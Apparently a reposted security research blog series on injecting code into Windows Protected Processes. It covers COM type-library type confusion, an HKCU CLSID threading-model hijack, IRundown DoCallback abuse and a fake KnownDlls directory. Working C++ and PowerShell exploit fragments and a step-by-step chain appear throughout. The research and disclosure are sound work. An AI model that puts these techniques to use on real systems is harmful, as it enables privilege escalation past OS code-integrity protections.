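      L" /file " + std::to_wstring((ULONG_PTR)hDump) +
      L" /encfile " + std::to_wstring((ULONG_PTR)hEncDump) +
      L" /cancel " + std::to_wstring((ULONG_PTR)hCancel) +
      L" /type 2";  // 2 == MiniDumpWithFullMemory, chosen for this example
  STARTUPINFOW si = { sizeof(si) };
  PROCESS_INFORMATION pi = {};
  // CREATE_PROTECTED_PROCESS asks the kernel to start the image protected;
  // the level actually granted is derived from the executable's signature.
  if (!CreateProcessW(werPath.c_str(), &cmd[0], nullptr, nullptr,
                      TRUE /* inherit handles */, CREATE_PROTECTED_PROCESS,
                      nullptr, nullptr, &si, &pi)) {
    return false;
  }
  CloseHandle(pi.hThread);
  CloseHandle(pi.hProcess);
  return true;
}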

Putting it All Together

There’s still two things we need to complete the exploit: how to get WerFaultSecure to start up COM, and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.

Let’s tackle the first part, how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before, so to save time I just asked him. The trick was to get WerFaultSecure to dump an AppContainer process, which results in a call to the method CCrashReport::ExemptFromPlmHandling inside the FaultRep DLL, resulting in the loading of CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, which resolves to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.

Unfortunately I’ve not been entirely truthful during my description of how COM remoting is set up. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense, if all COM calls are to code within the same apartment then why bother to initialize the entire remoting code for COM. In this case even though we can make WerFaultSecure load a COM object it doesn’t meet the conditions to set up remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below the COM registration is being queried first from HKEY_CURRENT_USER, which means we can hijack it without needing administrator privileges.

Unfortunately looking at the code this won’t work; a cut down version is shown below:

HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId) {
  CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);
  IOSTaskCompletion* inf;
  HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion, NULL,
                                CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));
  if (SUCCEEDED(hr)) {
    // Open process and disable PLM handling.
  }
}

The code passes the flag CLSCTX_INPROC_SERVER to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replace the registration with one for an OOP class the COM runtime would just ignore it. Fortunately there’s another way: the code is initializing the current thread’s COM apartment as a STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object its threading model is set to “Both”. What this means in practice is the object supports being called directly from either a STA or an MTA.

However, if the threading model was instead set to “Free” then the object only supports direct calls from an MTA, which means the COM runtime will have to enable remoting, create the object in an MTA (using something similar to DoCallback) then marshal calls to that object from the original apartment. Once COM starts remoting it initializes all remote features including IRundown. As we can hijack the server registration we can just change the threading model; this will cause WerFaultSecure to start COM remoting, which we can now exploit.

What about the second part, what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria, to avoid undefined behavior:

  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the call are returned as the HRESULT if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special then at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria as it takes a single parameter which is a pointer to the DLL path and we don’t really care about the return value, so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?

Wait, didn’t I say that PP can’t load from KnownDlls? Yes, but only because the value of the LdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL, if the handle is NULL the check returns immediately. However if the handle has a value it will do the normal check and, just like in PPL, no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.

The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer value argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair SetProcessDefaultLayout and GetProcessDefaultLayout in USER32. The set function takes a single value which is a set of flags and stores it in a global location (actually in the kernel, but good enough). The get method will then write that value to an arbitrary pointer. This isn’t perfect as the values we can set and therefore write are limited to the numbers 0-7, however by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where the ? can be any value between 0 and 7. As the value just has to refer to the handle inside a process under our control we can easily craft the handle to meet these strict requirements.
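As a rough illustration of that primitive (not the author’s exact code), each call below would in practice be issued inside the protected process via IRundown::DoCallback, which is possible because both USER32 exports take a single pointer-sized argument:

#include <windows.h>

// Sketch of the limited write primitive: stash a small flag value (only 0-7
// are usable) with the set call, then flush it to an arbitrary pointer with
// the get call. Shown in-process purely to illustrate the data flow.
void WriteSmallValue(DWORD value, DWORD* target) {
  SetProcessDefaultLayout(value);   // store the value (kept in the kernel)
  GetProcessDefaultLayout(target);  // write it out to the chosen address
}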

Wrapping Up

In conclusion, to get arbitrary code execution inside a PP-WindowsTCB process without requiring administrator privileges we can do the following:

  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to "Free" (a registry sketch for this step follows the list).
  3. Start Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump from an AppContainer process. During process creation the fake KnownDlls must be added to ensure it’s inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.
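For step 2, the class registration can be overridden per-user because HKEY_CURRENT_USER\Software\Classes is consulted first. A minimal sketch of that hijack is below; in the described attack the existing server DLL is kept and only the ThreadingModel changes, so the server path here is just a placeholder:

#include <windows.h>

// Sketch: register an InProcServer32 entry for the CLSID loaded by
// CCrashReport::ExemptFromPlmHandling under HKCU with ThreadingModel "Free",
// forcing the COM runtime in WerFaultSecure to initialize remoting (and
// therefore IRundown). The DLL path is a placeholder for this example.
bool HijackClsidThreadingModel() {
  const wchar_t* keyPath =
      L"Software\\Classes\\CLSID\\{07FC2B94-5285-417E-8AC3-C2CE5240B0FA}"
      L"\\InProcServer32";
  HKEY hKey;
  if (RegCreateKeyExW(HKEY_CURRENT_USER, keyPath, 0, nullptr, 0,
                      KEY_SET_VALUE, nullptr, &hKey, nullptr) != ERROR_SUCCESS)
    return false;
  const wchar_t server[] = L"C:\\path\\to\\original\\server.dll";
  const wchar_t model[] = L"Free";
  RegSetValueExW(hKey, nullptr, 0, REG_SZ,
                 reinterpret_cast<const BYTE*>(server), sizeof(server));
  RegSetValueExW(hKey, L"ThreadingModel", 0, REG_SZ,
                 reinterpret_cast<const BYTE*>(model), sizeof(model));
  RegCloseKey(hKey);
  return true;
}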

This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invoking DoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities, perhaps this behavior is of more use to others.
That concludes my series of attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as registry and files, is ultimately doomed to fail. This is probably why Microsoft does not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL, for the most part, doesn’t. I wouldn’t be surprised if newer versions of Windows 10, by which I mean after version 1809, will try to mitigate these attacks in some way, but you’ll almost certainly be able to find a bypass.

Injecting Code into Windows Protected Processes using COM — Part 1

( Original text by James Forshaw )

At Recon Montreal 2018 I presented “Unknown Known DLLs and other Code Integrity Trust Violations” with Alex Ionescu. We described the implementation of Microsoft Windows’ Code Integrity mechanisms and how Microsoft implemented Protected Processes (PP). As part of that I demonstrated various ways of bypassing Protected Process Light (PPL), some requiring administrator privileges, others not.

In this blog I’m going to describe the process I went through to discover a way of injecting code into a PPL on Windows 10 1803. As the only issue Microsoft considered to be violating a defended security boundary has now been fixed I can discuss the exploit in more detail.

Background on Windows Protected Processes

The origins of the Windows Protected Process (PP) model stretch back to Vista where it was introduced to protect DRM processes. The protected process model was heavily restricted, limiting loaded DLLs to a subset of code installed with the operating system. Also, for an executable to be considered eligible to be started protected it must be signed with a specific Microsoft certificate which is embedded in the binary. One protection that the kernel enforced is that a non-protected process couldn’t open a handle to a protected process with enough rights to inject arbitrary code or read memory.

In Windows 8.1 a new mechanism was introduced, Protected Process Light (PPL), which made the protection more generalized. PPL loosened some of the restrictions on what DLLs were considered valid for loading into a protected process and introduced different signing requirements for the main executable. Another big change was the introduction of a set of signing levels to separate out different types of protected processes. A PPL in one level can open for full access any process at the same signing level or below, with a restricted set of access granted to levels above. These signing levels were extended to the old PP model; a PP at one level can open all PP and PPL at the same signing level or below, however the reverse is not true, a PPL can never open a PP at any signing level for full access. Some of the levels and this relationship are shown below:

Signing levels allow Microsoft to open up protected processes to third-parties, although at the current time the only type of protected process that a third party can create is an Anti-Malware PPL. The Anti-Malware level is special as it allows the third party to add additional permitted signing keys by registering an Early Launch Anti-Malware (ELAM) certificate. There is also Microsoft’s TruePlay, which is an Anti-Cheat technology for games which uses components of PPL, but it isn’t really important for this discussion. I could spend a lot of this blog post describing how PP and PPL work under the hood, but I recommend reading the blog post series by Alex Ionescu instead (Parts 1, 2 and 3) which will do a better job. While the blog posts are primarily based on Windows 8.1, most of the concepts haven’t changed substantially in Windows 10.

I’ve written about Protected Processes before, in the form of the custom implementation by Oracle in their VirtualBox virtualization platform on Windows. The blog showed how I bypassed the process protection using multiple different techniques. What I didn’t mention at the time was the first technique I described, injecting JScript code into the process, also worked against Microsoft’s PPL implementation. I reported that I could inject arbitrary code into a PPL to Microsoft (see Issue 1336) from an abundance of caution in case Microsoft wanted to fix it. In this case Microsoft decided it wouldn’t be fixed in a security bulletin. However Microsoft did fix the issue in the next major release of Windows (version 1803) by adding the following code to CI.DLL, the kernel’s Code Integrity library:

UNICODE_STRING g_BlockedDllsForPPL[] = {
  DECLARE_USTR("scrobj.dll"),
  DECLARE_USTR("scrrun.dll"),
  DECLARE_USTR("jscript.dll"),
  DECLARE_USTR("jscript9.dll"),
  DECLARE_USTR("vbscript.dll")
};

NTSTATUS CipMitigatePPLBypassThroughInterpreters(PEPROCESS Process,
                                                 LPBYTE Image,
                                                 SIZE_T ImageSize) {
  if (!PsIsProtectedProcess(Process))
    return STATUS_SUCCESS;

  UNICODE_STRING OriginalImageName;
  // Get the original filename from the image resources.
  SIPolicyGetOriginalFilenameAndVersionFromImageBase(
      Image, ImageSize, &OriginalImageName);
  for (int i = 0; i < _countof(g_BlockedDllsForPPL); ++i) {
    if (RtlEqualUnicodeString(&g_BlockedDllsForPPL[i],
                              &OriginalImageName, TRUE)) {
      return STATUS_DYNAMIC_CODE_BLOCKED;
    }
  }
  return STATUS_SUCCESS;
}

The fix checks the original file name in the resource section of the image being loaded against a blacklist of 5 DLLs. The blacklist includes DLLs such as JSCRIPT.DLL, which implements the original JScript scripting engine, and SCROBJ.DLL, which implements scriptlet objects. If the kernel detects a PP or PPL loading one of these DLLs the image load is rejected with STATUS_DYNAMIC_CODE_BLOCKED. This kills my exploit: if you modify the resource section of one of the listed DLLs the signature of the image will be invalidated, resulting in the image load failing due to a cryptographic hash mismatch. It’s actually the same fix that Oracle used to block the attack in VirtualBox, although that was implemented in user-mode.
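For reference, the "original filename" the kernel compares against its blacklist is the OriginalFilename string from the image's version resource. A user-mode equivalent can be read with the version APIs; this sketch hardcodes the common US-English/Unicode language block (040904b0), which real code should look up from \VarFileInfo\Translation instead:

#include <windows.h>
#include <string>
#pragma comment(lib, "version.lib")

// Sketch: read OriginalFilename from a PE's version resource, the same field
// the CI.DLL fix compares against its interpreter blacklist.
std::wstring GetOriginalFilename(const wchar_t* path) {
  DWORD size = GetFileVersionInfoSizeW(path, nullptr);
  if (!size) return L"";
  std::wstring buf(size, L'\0');
  if (!GetFileVersionInfoW(path, 0, size, &buf[0])) return L"";
  void* value = nullptr;
  UINT len = 0;
  if (!VerQueryValueW(&buf[0],
                      L"\\StringFileInfo\\040904b0\\OriginalFilename",
                      &value, &len) || !value) {
    return L"";
  }
  return std::wstring(static_cast<const wchar_t*>(value));
}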

Finding New Targets

The previous injection technique using script code was a generic technique that worked on any PPL which loaded a COM object. With the technique fixed I decided to go back and look at what executables will load as a PPL to see if they have any obvious vulnerabilities I could exploit to get arbitrary code execution. I could have chosen to go after a full PP, but PPL seemed the easier of the two and I’ve got to start somewhere. There are so many ways to inject into a PPL if we could just get administrator privileges, the least of which is just loading a kernel driver. For that reason any vulnerability I discover must work from a normal user account. Also I wanted to get the highest signing level I can get, which means PPL at Windows TCB signing level.

The first step was to identify executables which run as a protected process; this gives us the maximum attack surface to analyze for vulnerabilities. Based on the blog posts from Alex it seemed that in order to be loaded as PP or PPL the signing certificate needs a special Object Identifier (OID) in the certificate’s Enhanced Key Usage (EKU) extension. There are separate OIDs for PP and PPL; we can see this below with a comparison between WERFAULTSECURE.EXE, which can run as PP/PPL, and CSRSS.EXE, which can only run as PPL.

I decided to look for executables which have an embedded signature with these EKU OIDs, which would give me a list of all executables to look at for exploitable behavior. I wrote the Get-EmbeddedAuthenticodeSignature cmdlet for my NtObjectManager PowerShell module to extract this information.

At this point I realized there was a problem with the approach of relying on the signing certificate: there are a lot of binaries I expected to be allowed to run as PP or PPL which were missing from the list I generated. As PP was originally designed for DRM there was no obvious executable to handle the Protected Media Path, such as AUDIODG.EXE. Also, based on my previous research into Device Guard and Windows 10S, I knew there must be an executable in the .NET framework which could run as PPL to add cached signing level information to NGEN generated binaries (NGEN is an Ahead-of-Time JIT to convert a .NET assembly into native code). The criteria for PP/PPL were more fluid than I expected. Instead of doing static analysis I decided to perform dynamic analysis: just start every executable I could enumerate as protected and query the protection level granted. I wrote the following script to test a single executable:

Import-Module NtObjectManager

function Test-ProtectedProcess {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)]
        [string]$FullName,
        [NtApiDotNet.PsProtectedType]$ProtectedType = 0,
        [NtApiDotNet.PsProtectedSigner]$ProtectedSigner = 0
    )
    BEGIN {
        $config = New-NtProcessConfig abc -ProcessFlags ProtectedProcess `
            -ThreadFlags Suspended -TerminateOnDispose `
            -ProtectedType $ProtectedType `
            -ProtectedSigner $ProtectedSigner
    }
    PROCESS {
        $path = Get-NtFilePath $FullName
        Write-Host $path
        try {
            Use-NtObject($p = New-NtProcess $path -Config $config) {
                $prot = $p.Process.Protection
                $props = @{
                    Path=$path;
                    Type=$prot.Type;
                    Signer=$prot.Signer;
                    Level=$prot.Level.ToString("X");
                }
                $obj = New-Object -TypeName PSObject -Prop $props
                Write-Output $obj
            }
        } catch {}
    }
}

When this script is executed a function is defined, Test-ProtectedProcess. The function takes a path to an executable, starts that executable with a specified protection level and checks whether it was successful. If the ProtectedType and ProtectedSigner parameters are 0 then the kernel decides the “best” process level. This leads to some annoying quirks: for example SVCHOST.EXE is explicitly marked as PPL and will run at PPL-Windows level, however as it’s also a signed OS component the kernel will determine its maximum level is PP-Authenticode. Another interesting quirk is that using the native process creation APIs it’s possible to start a DLL as the main executable image. As a significant number of system DLLs have embedded Microsoft signatures they can also be started as PP-Authenticode, even though this isn’t necessarily that useful. The list of binaries that will run at PPL is shown below along with their maximum signing level.

Path                                                           Signing Level
C:\windows\Microsoft.Net\Framework\v4.0.30319\mscorsvw.exe    CodeGen
C:\windows\Microsoft.Net\Framework64\v4.0.30319\mscorsvw.exe  CodeGen
C:\windows\system32\SecurityHealthService.exe                 Windows
C:\windows\system32\svchost.exe                               Windows
C:\windows\system32\xbgmsvc.exe                               Windows
C:\windows\system32\csrss.exe                                 Windows TCB
C:\windows\system32\services.exe                              Windows TCB
C:\windows\system32\smss.exe                                  Windows TCB
C:\windows\system32\werfaultsecure.exe                        Windows TCB
C:\windows\system32\wininit.exe                               Windows TCB

Injecting Arbitrary Code Into NGEN

After carefully reviewing the list of executables which run as PPL I settled on trying to attack the previously mentioned .NET NGEN binary, MSCORSVW.EXE. My rationale for choosing the NGEN binary was:

  • Most of the other binaries are service binaries which might need administrator privileges to start correctly.
  • The binary is likely to be loading complex functionality such as the .NET framework as well as having multiple COM interactions (my go-to technology for weird behavior).
  • In the worst case it might still yield a Device Guard bypass as the reason it runs as PPL is to give it access to the kernel APIs to apply a cached signing level. Any bug in the operation of this binary might be exploitable even if we can’t get arbitrary code running in a PPL.

But there is an issue with the NGEN binary: it doesn’t meet my own criteria that I get the top signing level, Windows TCB. However, I knew that when Microsoft fixed Issue 1332 they left in a back door where a writable handle could be maintained during the signing process if the calling process is PPL, as shown below:

NTSTATUS CiSetFileCache(HANDLE Handle, ...) {

  PFILE_OBJECT FileObject;
  ObReferenceObjectByHandle(Handle, &FileObject);

  if (FileObject->SharedWrite ||
      (FileObject->WriteAccess &&
       PsGetProcessProtection().Type != PROTECTED_LIGHT)) {
    return STATUS_SHARING_VIOLATION;
  }

  // Continue setting file cache.
}

If I could get code execution inside the NGEN binary I could reuse this backdoor to cache sign an arbitrary file which will load into any PPL. I could then DLL hijack a full PPL-WindowsTCB process to reach my goal.

To begin the investigation we need to determine how to use the MSCORSVW executable. Using MSCORSVW is not documented anywhere by Microsoft, so we’ll have to do a bit of digging. First off, this binary is not supposed to be run directly; instead it’s invoked by NGEN when creating an NGEN’ed binary. Therefore, we can run the NGEN binary and use a tool such as Process Monitor to capture what command line is being used for the MSCORSVW process. Executing the command:

C:\> NGEN install c:\some\binary.dll

results in the following command line being executed:

MSCORSVW -StartupEvent A -InterruptEvent B -NGENProcess C -Pipe D

A, B, C and D are handles which NGEN ensures are inherited into the new process before it starts. As we don’t see any of the original NGEN command line parameters it seems likely they’re being passed over an IPC mechanism. The “Pipe” parameter gives an indication that named pipes are used for IPC. Digging into the code in MSCORSVW, we find the method NGenWorkerEmbedding, which looks like the following:

void NGenWorkerEmbedding(HANDLE hPipe) {
 CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED);
 CorSvcBindToWorkerClassFactory factory;

 // Marshal class factory.
 IStream* pStm;
 CreateStreamOnHGlobal(nullptr, TRUE,&pStm);
 CoMarshalInterface(pStm,&IID_IClassFactory, &factory,                    MSHCTX_LOCAL,nullptr, MSHLFLAGS_NORMAL);

 // Read marshaled object and write to pipe.
 DWORD length;
 char* buffer = ReadEntireIStream(pStm,&length);
 WriteFile(hPipe,&length,sizeof(length));
 WriteFile(hPipe, buffer, length);
 CloseHandle(hPipe);

 // Set event to synchronize with parent.
 SetEvent(hStartupEvent);

 // Pump message loop to handle COM calls.
 MessageLoop();

 // …
}

This code is not quite what I expected. Rather than using the named pipe for the entire communication channel, it’s only used to transfer a marshaled COM object back to the calling process. The COM object is a class factory instance; normally you’d register the factory using CoRegisterClassObject but that would make it accessible to all processes at the same security level, so instead, by using marshaling, the connection can be left private only to the NGEN binary which spawned MSCORSVW. A .NET related process using COM gets me interested as I’ve previously described in another blog post how you can exploit COM objects implemented in .NET. If we’re lucky this COM object is implemented in .NET; we can determine whether it is by querying for its interfaces, for example using the Get-ComInterface command in my OleViewDotNet PowerShell module, as shown in the following screenshot.

We’re out of luck, this object is not implemented in .NET, as you’d at least expect to see an instance of the _Object interface. There’s only one interface implemented, ICorSvcBindToWorker, so let’s dig into that interface to see if there’s anything we can exploit.

Something caught my eye: in the screenshot there’s a HasTypeLib column, and for ICorSvcBindToWorker we see that the column is set to True. What HasTypeLib indicates is that rather than the interface’s proxy code being implemented using a predefined NDR byte stream, it’s generated on the fly from a type library. I’ve abused this auto-generating proxy mechanism before to elevate to SYSTEM, reported as Issue 1112. In the issue I used some interesting behavior of the system’s Running Object Table (ROT) to force a type confusion in a system COM service. While Microsoft has fixed the issue for User to SYSTEM there’s nothing stopping us using the type confusion trick to exploit the MSCORSVW process running as PPL at the same privilege level and get arbitrary code execution. Another advantage of using a type library is a normal proxy would be loaded as a DLL, which means that it must meet the PPL signing level requirements; however a type library is just data so it can be loaded into a PPL without any signing level violations.

How does the type confusion work? Looking at the ICorSvcBindToWorker interface from the type library:

interface ICorSvcBindToWorker : IUnknown {
   HRESULT BindToRuntimeWorker(
[in] BSTR pRuntimeVersion,
[in] unsigned long ParentProcessID,
[in] BSTR pInterruptEventName,
[in] ICorSvcLogger* pCorSvcLogger,
[out] ICorSvcWorker** pCorSvcWorker);
};

The single method, BindToRuntimeWorker, takes 5 parameters: 4 are inbound and 1 is outbound. When trying to access the method over DCOM from our untrusted process the system will automatically generate the proxy and stub for the call. This will include marshaling COM interface parameters into a buffer, sending the buffer to the remote process and then unmarshaling it to a pointer before calling the real function. For example imagine a simpler function, DoSomething, which takes a single IUnknown pointer. The marshaling process looks like the following:

The operation of the method call is as follows:

  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an IUnknown pointer parameter.
  2. DoSomethingProxy marshals the IUnknown pointer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the interface pointer from the buffer. Note that this pointer is not the original pointer from step 1, it’s likely to be a new proxy which calls back to the untrusted process.
  4. The stub invokes the real implemented method inside the server, passing the unmarshaled interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable.

How would we exploit this? All we need to do is modify the type library so that instead of passing an interface pointer we pass almost anything else. While the type library file is in a system location which we can’t modify, we can just replace the registration for it in the current user’s registry hive, or use the same ROT trick from Issue 1112. For example if we modify the type library to pass an integer instead of an interface pointer we get the following:

The operation of the marshal now changes as follows:

  1. The untrusted process calls DoSomething on the interface which is actually a pointer to DoSomethingProxy which was auto-generated from the type library passing an arbitrary integer parameter.
  2. DoSomethingProxy marshals the integer parameter into the buffer and calls over RPC to the Stub in the protected process.
  3. The COM runtime calls the DoSomethingStub method to handle the call. This method will unmarshal the integer from the buffer.
  4. The stub invokes the real implemented method inside the server, passing the integer as the parameter. However DoSomething hasn’t changed, it’s still the same method which accepts an interface pointer. As the COM runtime has no more type information at this point the integer is type confused with the interface pointer.
  5. DoSomething uses the interface pointer, for example by calling AddRef on it via the object’s VTable. As this pointer is completely under control of the untrusted process this likely results in arbitrary code execution.

By changing the type of parameter from an interface pointer to an integer we induce a type confusion which allows us to get an arbitrary pointer dereferenced, resulting in arbitrary code execution. We could even simplify the attack by adding to the type library the following structure:

struct FakeObject {
   BSTR FakeVTable;
};

If we pass a pointer to a FakeObject instead of the interface pointer, the auto-generated proxy will marshal the structure and its BSTR, recreating it on the other side in the stub. As a BSTR is a counted string it can contain NULLs, so this will create a pointer to an object which contains a pointer to an arbitrary byte array which can act as a VTable. Place known function pointers in that BSTR and you can easily redirect execution without having to guess the location of a suitable VTable buffer.

To fully exploit this we’d need to call a suitable method, probably running a ROP chain, and we might also have to bypass CFG. That all sounds too much like hard work, so instead I’ll take a different approach to get arbitrary code running in the PPL binary, by abusing KnownDlls.
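Although the post moves on to a simpler data-only approach, a small, purely illustrative sketch of the FakeObject idea is shown below: the BSTR just carries a byte array of function pointers that the server will reinterpret as the object's vtable after the type confusion (the helper name is invented for this example):

#include <windows.h>
#include <oleauto.h>

// Illustrative only: build a FakeObject whose single field is a BSTR
// containing an array of pointers. BSTRs are counted strings, so the
// embedded NUL bytes from pointer values survive marshaling intact.
struct FakeObject {
  BSTR FakeVTable;
};

FakeObject BuildFakeObject(void* const* funcs, size_t count) {
  FakeObject obj = {};
  obj.FakeVTable = SysAllocStringByteLen(
      reinterpret_cast<const char*>(funcs),
      static_cast<UINT>(count * sizeof(void*)));
  return obj;
}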

KnownDlls and Protected Processes.

In my previous blog post I described a technique to elevate privileges from an arbitrary object directory creation vulnerability to SYSTEM by adding an entry into the KnownDlls directory and getting an arbitrary DLL loaded into a privileged process. I noted that this was also an administrator-to-PPL code injection, as PPL will also load DLLs from the system’s KnownDlls location. As the code signing check is performed during section creation, not section mapping, as long as you can place an entry into KnownDlls you can load anything into a PPL, even unsigned code.

This doesn’t immediately seem that useful; we can’t write to KnownDlls without being an administrator, and even then not without some clever tricks. However it’s worth looking at how a Known DLL is loaded to get an understanding of how it can be abused. Inside NTDLL’s loader (LDR) code is the following function to determine if there’s a preexisting Known DLL:

NTSTATUS LdrpFindKnownDll(PUNICODE_STRING DllName, HANDLE *SectionHandle) {
 // If KnownDll directory handle not open then return error.
if(!LdrpKnownDllDirectoryHandle)
return STATUS_DLL_NOT_FOUND;

 OBJECT_ATTRIBUTES ObjectAttributes;
 InitializeObjectAttributes(&ObjectAttributes,
&DllName,
   OBJ_CASE_INSENSITIVE,
   LdrpKnownDllDirectoryHandle,
nullptr);

return NtOpenSection(SectionHandle,
                      SECTION_ALL_ACCESS,
&ObjectAttributes);
}

The LdrpFindKnownDll function calls NtOpenSection to open the named section object for the Known DLL. It doesn’t open an absolute path; instead it uses the feature of the native system calls to specify a root directory for the object name lookup in the OBJECT_ATTRIBUTES structure. This root directory comes from the global variable LdrpKnownDllDirectoryHandle. Implementing the call this way allows the loader to only specify the filename (e.g. EXAMPLE.DLL) and not have to reconstruct the absolute path, as the lookup will be relative to an existing directory. Chasing references to LdrpKnownDllDirectoryHandle we can find it’s initialized in LdrpInitializeProcess as follows:

NTSTATUS LdrpInitializeProcess() {
 // …
 PPEB peb = // …
 // If a full protected process don’t use KnownDlls.
if(peb->IsProtectedProcess &&!peb->IsProtectedProcessLight){
   LdrpKnownDllDirectoryHandle =nullptr;
}else{
   OBJECT_ATTRIBUTES ObjectAttributes;
   UNICODE_STRING DirName;
   RtlInitUnicodeString(&DirName, L"\\KnownDlls");
   InitializeObjectAttributes(&ObjectAttributes,
&DirName,
                              OBJ_CASE_INSENSITIVE,
nullptr,nullptr);
   // Open KnownDlls directory.
   NtOpenDirectoryObject(&LdrpKnownDllDirectoryHandle,
                         DIRECTORY_QUERY | DIRECTORY_TRAVERSE,
&ObjectAttributes);
  }
}

This code shouldn’t be that unexpected; the implementation calls NtOpenDirectoryObject, passing the absolute path to the KnownDlls directory as the object name. The opened handle is stored in the LdrpKnownDllDirectoryHandle global variable for later use. It’s worth noting that this code checks the PEB to determine if the current process is a full protected process. Support for loading Known DLLs is disabled in full protected process mode, which is why even with administrator privileges and the clever trick I outlined in the last blog post we could only compromise PPL, not PP.

How does this knowledge help us? We can use our COM type confusion trick to write values into arbitrary memory locations instead of trying to hijack code execution, resulting in a data-only attack. As we can inherit any handles we like into the new PPL process, we can set up an object directory with a named section, then use the type confusion to change the value of LdrpKnownDllDirectoryHandle to the value of the inherited handle. If we induce a DLL load from System32 with a known name the LDR will check our fake directory for the named section and map our unsigned code into memory, even calling DllMain for us. No need for injecting threads, ROP or bypassing CFG.

All we need is a suitable primitive to write an arbitrary value. Unfortunately, while I could find methods which would cause an arbitrary write, I couldn’t sufficiently control the value being written. In the end I used the following interface and method which was implemented on the object returned by ICorSvcBindToWorker::BindToRuntimeWorker:

interface ICorSvcPooledWorker : IUnknown {
   HRESULT CanReuseProcess(
[in] OptimizationScenario scenario,
[in] ICorSvcLogger* pCorSvcLogger,
[out] long* pCanContinue);
};
In the implementation of CanReuseProcess the target value of pCanContinue is always initialized to 0. Therefore by replacing the [out] long* in the type library definition with [in] long we can get 0 written to any memory location we specify. By prefilling the lower 16 bits of the new process’ handle table with handles to a fake KnownDlls directory we can be sure of an alias between the real KnownDlls which will be opened once the process starts and our fake ones by just modifying the top 16 bits of the handle to 0. This is shown in the following diagram:

Once we’ve overwritten the top 16 bits with 0 (the write is 32 bits but handles are 64 bits in 64 bit mode, so we won’t overwrite anything important) LdrpKnownDllDirectoryHandle now points to one of our fake KnownDlls handles. We can then easily induce a DLL load by sending a custom marshaled object to the same method and we’ll get arbitrary code execution inside the PPL.
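A rough sketch of the handle prefilling step is shown below. It assumes the fake KnownDlls object directory has already been created (for example with NtCreateDirectoryObject) and populated with a named section for the DLL we want loaded; the duplicate count is illustrative. Because inherited handles keep their values in the child process, saturating the low handle values means that zeroing the top 16 bits of the real KnownDlls handle aliases onto one of ours.

#include <windows.h>
#include <vector>

// Sketch: create many inheritable duplicates of the fake KnownDlls directory
// handle so that low handle values in the child are occupied by aliases of it.
std::vector<HANDLE> PrefillInheritableHandles(HANDLE hFakeKnownDlls,
                                              size_t count) {
  std::vector<HANDLE> dups;
  dups.reserve(count);
  for (size_t i = 0; i < count; ++i) {
    HANDLE dup = nullptr;
    if (!DuplicateHandle(GetCurrentProcess(), hFakeKnownDlls,
                         GetCurrentProcess(), &dup, 0,
                         TRUE /* inheritable */, DUPLICATE_SAME_ACCESS)) {
      break;
    }
    dups.push_back(dup);  // keep them open so the slots stay occupied
  }
  return dups;
}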

Elevating to PPL-Windows TCB

We can’t stop here; attacking MSCORSVW only gets us PPL at the CodeGen signing level, not Windows TCB. Knowing that a fake cached-signed DLL should still load into a PPL, and that Microsoft had left a backdoor for PPL processes at any signing level, I converted my C# code from Issue 1332 to C++ to generate a fake cached signed DLL. By abusing a DLL hijack in WERFAULTSECURE.EXE, which will run as PPL Windows TCB, we should get code execution at the desired signing level. This worked on Windows 10 1709 and earlier, however it didn’t work on 1803. Clearly Microsoft had changed the behavior of cached signing levels in some way; perhaps they’d removed its trust in PPL entirely. That seemed unlikely as it would have a negative performance impact.

